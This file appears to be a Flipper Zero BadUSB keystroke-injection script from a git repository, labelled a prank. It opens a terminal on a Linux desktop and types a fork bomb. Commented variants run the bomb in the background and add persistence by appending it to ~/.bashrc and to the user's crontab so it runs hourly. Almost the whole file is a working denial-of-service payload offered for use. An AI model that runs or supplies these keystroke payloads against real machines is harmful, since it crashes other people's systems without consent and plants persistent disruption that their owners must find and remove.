Flipper/BadUSB/Bombs/Sys_Forker/ForkBomb-Linux.txt

23 lines
904 B
Plaintext
Raw Normal View History

2022-07-15 17:06:27 +00:00
REM Title: Terminal forkbomb
2022-07-15 17:01:11 +00:00
REM Author: FalsePhilosopher
REM Target: Unix-like tested on kubuntu 22.04.
REM Props: Hak5, 7h30th3r0n3 for the initial submission of a simpler version of drapl0n's terminalbomb script, UberGuidoZ for keeping the flipper repo going.
REM Version: 1.0
REM Category: Prank
REM Launches terminal and spawns a terminal forkbomb
REM
2022-07-15 00:17:48 +00:00
DELAY 300
2022-07-15 17:01:11 +00:00
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 2000
2022-08-13 04:26:44 +00:00
REM STRING :(){ :|:& };:
2022-07-15 00:17:48 +00:00
ENTER
2022-07-15 17:01:11 +00:00
REM If you want to do it in the background so you can close the terminal with adding ALT F4
2022-08-13 04:26:44 +00:00
REM STRING nohup :(){ :|:& };: >> /dev/null & disown
2022-07-15 17:01:11 +00:00
REM if you want to do it every time they open a terminal like drapl0n's terminalbomb style
REM STRING echo ":(){ :|:& };:" >> ~/.bashrc
REM if you want to make it happen every hour
REM STRING crontab -l | sed "\$a\@hourly sh :(){ :|:& };:" | crontab -